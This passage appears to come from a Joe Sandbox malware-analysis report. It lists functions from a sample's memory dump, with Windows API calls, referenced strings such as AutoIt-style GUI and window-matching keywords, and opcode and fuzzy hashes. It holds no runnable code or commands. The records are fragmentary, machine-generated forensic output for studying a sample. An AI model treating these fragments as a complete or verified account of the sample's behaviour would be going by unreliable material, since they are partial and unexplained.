LoadCursorW.USER32(00000000,00007F82), ref: 00C3538D
LoadCursorW.USER32(00000000,00007F84), ref: 00C35398
LoadCursorW.USER32(00000000,00007F04), ref: 00C353A3
LoadCursorW.USER32(00000000,00007F02), ref: 00C353AE
GetCursorInfo.USER32(?), ref: 00C353BE
GetLastError.KERNEL32(00000001,00000000), ref: 00C353E9

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: d1e65cda86a063222568a569d529c550f674e1794ca6063f59c7fb345ee924c5
Instruction ID: 17c4f8437fb0246457c1606ae323016eb102f5325a801283010a38ee8eb2e2cc
Opcode Fuzzy Hash: d1e65cda86a063222568a569d529c550f674e1794ca6063f59c7fb345ee924c5
Instruction Fuzzy Hash: 0C417370E043196ADB109FBA8C49D6EFFF8EF51B10F10452FE519E7290DAB895018E61

Uniqueness

Uniqueness Score: -1.00%

Function 00C1AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00C1AAA5
__swprintf.LIBCMT ref: 00C1AB46
_wcscmp.LIBCMT ref: 00C1AB59
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C1ABAE
_wcscmp.LIBCMT ref: 00C1ABEA
GetClassNameW.USER32(?,?,00000400), ref: 00C1AC21
GetDlgCtrlID.USER32(?), ref: 00C1AC73
GetWindowRect.USER32(?,?), ref: 00C1ACA9
GetParent.USER32(?), ref: 00C1ACC7
ScreenToClient.USER32(00000000), ref: 00C1ACCE
GetClassNameW.USER32(?,?,00000100), ref: 00C1AD48
_wcscmp.LIBCMT ref: 00C1AD5C
GetWindowTextW.USER32(?,?,00000400), ref: 00C1AD82
_wcscmp.LIBCMT ref: 00C1AD96

Part of subcall function 00BE386C: _iswctype.LIBCMT ref: 00BE3874

Strings

%s%u, xrefs: 00C1AB40

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: f56430b8ae6155c2a019d117951d72c46a507c9fb616899b495c35bea425e65b
Instruction ID: b7541f2360bccba79b638eb7e84ac11573c0ba4837777e7132ddfed988fcc00b
Opcode Fuzzy Hash: f56430b8ae6155c2a019d117951d72c46a507c9fb616899b495c35bea425e65b
Instruction Fuzzy Hash: 7BA1D271205746AFD715EF20C884FEAB7E8FF06315F104629F9A9C2190DB30EA85DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C1B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00C1B3DB
_wcscmp.LIBCMT ref: 00C1B3EC
GetWindowTextW.USER32(00000001,?,00000400), ref: 00C1B414
CharUpperBuffW.USER32(?,00000000), ref: 00C1B431
_wcscmp.LIBCMT ref: 00C1B44F
_wcsstr.LIBCMT ref: 00C1B460
GetClassNameW.USER32(00000018,?,00000400), ref: 00C1B498
_wcscmp.LIBCMT ref: 00C1B4A8
GetWindowTextW.USER32(00000002,?,00000400), ref: 00C1B4CF
GetClassNameW.USER32(00000018,?,00000400), ref: 00C1B518
_wcscmp.LIBCMT ref: 00C1B528
GetClassNameW.USER32(00000010,?,00000400), ref: 00C1B550
GetWindowRect.USER32(00000004,?), ref: 00C1B5B9

Strings

@, xrefs: 00C1B3BC
ThumbnailClass, xrefs: 00C1B4A3, 00C1B523

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 251470dbfabf7c70bbc68da380a1a1d7a7b4410b525249bf4f8bdcabb115dd8f
Instruction ID: 76bd714d4968250f32dfd1bfaea79d4e2576a39436da2cf5f241f24efbca5c11
Opcode Fuzzy Hash: 251470dbfabf7c70bbc68da380a1a1d7a7b4410b525249bf4f8bdcabb115dd8f
Instruction Fuzzy Hash: 7B819D710082059BDB04DF11C885FAA7BE8EF56714F0485ADFD998A0A2DB34DE86DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00C4A428 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C4A4C8
DestroyWindow.USER32(?,?), ref: 00C4A542

Part of subcall function 00BC7D2C: _memmove.LIBCMT ref: 00BC7D66

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C4A5BC
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C4A5DE
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C4A5F1
DestroyWindow.USER32(00000000), ref: 00C4A613
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00BC0000,00000000), ref: 00C4A64A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C4A663
GetDesktopWindow.USER32 ref: 00C4A67C
GetWindowRect.USER32(00000000), ref: 00C4A683
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C4A69B
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C4A6B3

Part of subcall function 00BC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00BC25EC

Strings

0, xrefs: 00C4A4DE
@U=u, xrefs: 00C4A5DE, 00C4A5F1, 00C4A663, 00C4A68D
tooltips_class32, xrefs: 00C4A5B5, 00C4A643

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$@U=u$tooltips_class32
API String ID: 1297703922-1130792468
Opcode ID: 4973ac6f6f6f9fb6f03081146ed3242a39db7a7965a8de9cb74b84bd4d9d22a3
Instruction ID: b614e492cd8fee0b62287b1730a01c90c9203be7e44daa2b2b5f4137e847cbce
Opcode Fuzzy Hash: 4973ac6f6f6f9fb6f03081146ed3242a39db7a7965a8de9cb74b84bd4d9d22a3
Instruction Fuzzy Hash: E571AC75180205AFD720CF28CC49FAA7BF5FB89304F49452DF999872A1DB70EA02CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00C4C8EE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623

DragQueryPoint.SHELL32(?,?), ref: 00C4C917

Part of subcall function 00C4ADF1: ClientToScreen.USER32(?,?), ref: 00C4AE1A
Part of subcall function 00C4ADF1: GetWindowRect.USER32(?,?), ref: 00C4AE90
Part of subcall function 00C4ADF1: PtInRect.USER32(?,?,00C4C304), ref: 00C4AEA0

SendMessageW.USER32(?,000000B0,?,?), ref: 00C4C980
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C4C98B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C4C9AE
_wcscat.LIBCMT ref: 00C4C9DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C4C9F5
SendMessageW.USER32(?,000000B0,?,?), ref: 00C4CA0E
SendMessageW.USER32(?,000000B1,?,?), ref: 00C4CA25
SendMessageW.USER32(?,000000B1,?,?), ref: 00C4CA47
DragFinish.SHELL32(?), ref: 00C4CA4E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C4CB41

Strings

@GUI_DRAGFILE, xrefs: 00C4CAF0
@GUI_DRAGID, xrefs: 00C4CAB9
@GUI_DROPID, xrefs: 00C4CA6E
@U=u, xrefs: 00C4C980, 00C4C9F5, 00C4CA0E, 00C4CA25, 00C4CA47

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u
API String ID: 169749273-762882726
Opcode ID: bffc82d18c5921bcbcfdc4bea271bdb8ea3d4e4ee4f1a03fa5c39261bf66d2bb
Instruction ID: c8dd24389de8ff4de6d5509344c1fb9968f50f828560bfa03767c744de3da5b5
Opcode Fuzzy Hash: bffc82d18c5921bcbcfdc4bea271bdb8ea3d4e4ee4f1a03fa5c39261bf66d2bb
Instruction Fuzzy Hash: DA613771108300AFC711EF64DC85E9FBBE8FF99750F000A6EF595961A1DB709A49CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C1B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00C1B23F

Strings

CLASSNAME=, xrefs: 00C1B27C
[HANDLE:, xrefs: 00C1B24B
HANDLE=, xrefs: 00C1B238
[REGEXPTITLE:, xrefs: 00C1B267
[CLASS:, xrefs: 00C1B28F
[ALL, xrefs: 00C1B2E5
ALL, xrefs: 00C1B2D3
ACTIVE, xrefs: 00C1B21A
REGEXP=, xrefs: 00C1B254
LAST, xrefs: 00C1B204
[LAST, xrefs: 00C1B2EC
[ACTIVE, xrefs: 00C1B22C

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 598c5d108f19c8a3b26577375fa0eb9ef2b4a620080626435e8a1e1b18023a88
Instruction ID: 2f9ab8096d159688332cd23eaca07202efe7be09aaff0191b93dec1583311370
Opcode Fuzzy Hash: 598c5d108f19c8a3b26577375fa0eb9ef2b4a620080626435e8a1e1b18023a88
Instruction Fuzzy Hash: AB31CB30A44205A6CB14FA62CD43EEE77E8EF22B50F6041A9B455720E2EF316F48DA51

Uniqueness

Uniqueness Score: -1.00%

Function 00C44619 Relevance: 24.8, APIs: 2, Strings: 12, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C446AB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C446F6

Strings

CHECK, xrefs: 00C44716
ISCHECKED, xrefs: 00C44879
SELECT, xrefs: 00C448A7
UNCHECK, xrefs: 00C448D2
EXPAND, xrefs: 00C447A8
GETTEXT, xrefs: 00C44849
COLLAPSE, xrefs: 00C4473C
GETTOTALCOUNT, xrefs: 00C446DD
@U=u, xrefs: 00C446F6
GETSELECTED, xrefs: 00C44806
EXISTS, xrefs: 00C4475F
GETITEMCOUNT, xrefs: 00C447D8

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-383632319
Opcode ID: 8d9ef8f189e261b5716fe8a81274a60f84d408a3166a8b0a53526a2c52fe6b7f
Instruction ID: fa678925a8d91f7778dbcfa090938fbca494339c90aa15b26468fcaa43d4fdba
Opcode Fuzzy Hash: 8d9ef8f189e261b5716fe8a81274a60f84d408a3166a8b0a53526a2c52fe6b7f
Instruction Fuzzy Hash: 4F916F742047019BDB18EF11C851B6EB7E1BF95314F1588ACF8AA5B3A2CB70ED46DB81

Uniqueness

Uniqueness Score: -1.00%

Function 00C4BAB8 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00C4BB6E
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00C46D80,?), ref: 00C4BBCA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C4BC03
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00C4BC46
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C4BC7D
FreeLibrary.KERNEL32(?), ref: 00C4BC89
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C4BC99
DestroyIcon.USER32(?), ref: 00C4BCA8
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00C4BCC5
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00C4BCD1

Part of subcall function 00BE313D: __wcsicmp_l.LIBCMT ref: 00BE31C6

Strings

.dll, xrefs: 00C4BB27
.exe, xrefs: 00C4BB04
@U=u, xrefs: 00C4BCB1
.icl, xrefs: 00C4BAE4

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl$@U=u
API String ID: 1212759294-1639919054
Opcode ID: 6286096ed513eb38c32556791270635d3ea18d7a2dae215518cf936c7a4e7384
Instruction ID: 7ca2b71055fa41326fa44851867f57a87811ad4a650a530db7161914c1d9755f
Opcode Fuzzy Hash: 6286096ed513eb38c32556791270635d3ea18d7a2dae215518cf936c7a4e7384
Instruction Fuzzy Hash: 1061CE71900619BAEB14DF65CC86FBE7BA8FB08721F104169F825D61C0DB74EE91CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C2A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00BC9997: __itow.LIBCMT ref: 00BC99C2
Part of subcall function 00BC9997: __swprintf.LIBCMT ref: 00BC9A0C

CharLowerBuffW.USER32(?,?), ref: 00C2A636
GetDriveTypeW.KERNEL32 ref: 00C2A683
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C2A6CB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C2A702
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C2A730

Part of subcall function 00BC7D2C: _memmove.LIBCMT ref: 00BC7D66

Strings

type cdaudio alias cd wait, xrefs: 00C2A6AE
wait, xrefs: 00C2A6ED
set cd door , xrefs: 00C2A6D1
close, xrefs: 00C2A63C
closed, xrefs: 00C2A64A, 00C2A653
open , xrefs: 00C2A692
close cd wait, xrefs: 00C2A71B
open, xrefs: 00C2A65D

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 1e66ec3e561492d05a1d0c32ce8862ef44a611d91fed2e95799073bb6925712c
Instruction ID: 411dcf4c98e7650d0c5172b6fb47b3a4d85201c2fa94c38ed02a64435414ffc0
Opcode Fuzzy Hash: 1e66ec3e561492d05a1d0c32ce8862ef44a611d91fed2e95799073bb6925712c
Instruction Fuzzy Hash: 8F5129751043059FD700EF21D881E6AB7F8FF94718F1489ADF89A97261DB31AE0ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C2A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C2A47A
__swprintf.LIBCMT ref: 00C2A49C
CreateDirectoryW.KERNEL32(?,00000000), ref: 00C2A4D9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C2A4FE
_memset.LIBCMT ref: 00C2A51D
_wcsncpy.LIBCMT ref: 00C2A559
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C2A58E
CloseHandle.KERNEL32(00000000), ref: 00C2A599
RemoveDirectoryW.KERNEL32(?), ref: 00C2A5A2
CloseHandle.KERNEL32(00000000), ref: 00C2A5AC

Strings

\, xrefs: 00C2A4B2
\??\%s, xrefs: 00C2A496
:, xrefs: 00C2A4BD

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: e2648d453cce1741969d77b50ed7e62f76ba8ef630e36489573a81c2a98044e4
Instruction ID: 3260b15971e07d3b60fd1490d003ef57d90c6d601131a829b13d099e55dfa46d
Opcode Fuzzy Hash: e2648d453cce1741969d77b50ed7e62f76ba8ef630e36489573a81c2a98044e4
Instruction Fuzzy Hash: 69318EB5500119ABDB219FA1DC49FAF73BCEF89701F1041BAFA18D2161E77097458B25

Uniqueness

Uniqueness Score: -1.00%

Function 00C4C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C4C4EC
GetFocus.USER32 ref: 00C4C4FC
GetDlgCtrlID.USER32(00000000), ref: 00C4C507
_memset.LIBCMT ref: 00C4C632
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C4C65D
GetMenuItemCount.USER32(?), ref: 00C4C67D
GetMenuItemID.USER32(?,00000000), ref: 00C4C690
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C4C6C4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C4C70C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C4C744
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00C4C779

Strings

0, xrefs: 00C4C62A

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 1f1444eb976c97d219837af11b783b2faa5aa91cbe4b88ac9fdccc06ae191bb6
Instruction ID: 5872fcc0dc716b99cfb73d8474b112bdca2e0399b13d4efcfad3dbb84bd50d1e
Opcode Fuzzy Hash: 1f1444eb976c97d219837af11b783b2faa5aa91cbe4b88ac9fdccc06ae191bb6
Instruction Fuzzy Hash: 1D818F7050A301AFD750DF25C9C4AAFBBE8FB89314F00452DF995972A1D730EA05DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C183F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C1874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C18766
Part of subcall function 00C1874A: GetLastError.KERNEL32(?,00C1822A,?,?,?), ref: 00C18770
Part of subcall function 00C1874A: GetProcessHeap.KERNEL32(00000008,?,?,00C1822A,?,?,?), ref: 00C1877F
Part of subcall function 00C1874A: HeapAlloc.KERNEL32(00000000,?,00C1822A,?,?,?), ref: 00C18786
Part of subcall function 00C1874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C1879D

Part of subcall function 00C187E7: GetProcessHeap.KERNEL32(00000008,00C18240,00000000,00000000,?,00C18240,?), ref: 00C187F3
Part of subcall function 00C187E7: HeapAlloc.KERNEL32(00000000,?,00C18240,?), ref: 00C187FA
Part of subcall function 00C187E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C18240,?), ref: 00C1880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C18458
_memset.LIBCMT ref: 00C1846D
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C1848C
GetLengthSid.ADVAPI32(?), ref: 00C1849D
GetAce.ADVAPI32(?,00000000,?), ref: 00C184DA
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C184F6
GetLengthSid.ADVAPI32(?), ref: 00C18513
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C18522
HeapAlloc.KERNEL32(00000000), ref: 00C18529
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C1854A
CopySid.ADVAPI32(00000000), ref: 00C18551
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C18582
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C185A8
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C185BC

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: c743e469d403a9dfca7f20648ea1b3e57e5ba22be8ab1d7b2912f58d4f1be094
Instruction ID: 6078b1f19639a1752fea7958ea5010545692d2417d1942339eb88cfbe2284163
Opcode Fuzzy Hash: c743e469d403a9dfca7f20648ea1b3e57e5ba22be8ab1d7b2912f58d4f1be094
Instruction Fuzzy Hash: D0616C75904209AFDF00DFA0DC44AEEBBB9FF46310F04816AF825A7291DB309A49DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00C3762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00C376A2
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00C376AE
